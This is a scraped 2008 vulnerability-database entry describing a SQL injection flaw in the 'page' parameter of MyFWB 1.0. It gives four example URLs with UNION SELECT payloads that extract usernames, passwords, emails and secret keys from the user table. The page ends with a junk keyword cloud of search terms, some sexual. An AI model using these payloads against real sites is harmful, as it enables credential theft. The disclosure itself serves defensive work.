about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MyFWB Page Variable SQL Injection Vulnerability


Title MyFWB Page Variable SQL Injection Vulnerability
Published 2008-09-20-12:00AM
Updated 2008-09-22-04:59PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  0x90
Vulnerable  MyFWB MyFWB 1.0
Not Vulnerable  MyFWB MyFWB 1.1
Code  Attackers can exploit this issue via a browser.The following example URIs are available:Username:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,username,0+from+userPassword:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,password,0+from+userEmail:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+userSecret Key:
http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 16:19:25 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
kareenasex news for C violentchi Sex4000 kareenasex naked girl Toni scary maze purnhup se administra t109t beautiful Waptrick.c Sexy.women www.g714.c news for C news for c Ball bitin Indian por Www.petarb anel surecom news for c 60771 sexy pict news for c 2...Fsiste xss Www.sexmov xsexvideos /search/ex mambo Remo ftvangles sexs grl Top less ftvangles Sexo anal PHP+guestb www karach uc-forum.c travel.sta AOM shop.paipa search/exp asp free sex f vnc http WWW.ZOOSEX 200 /compo woltalb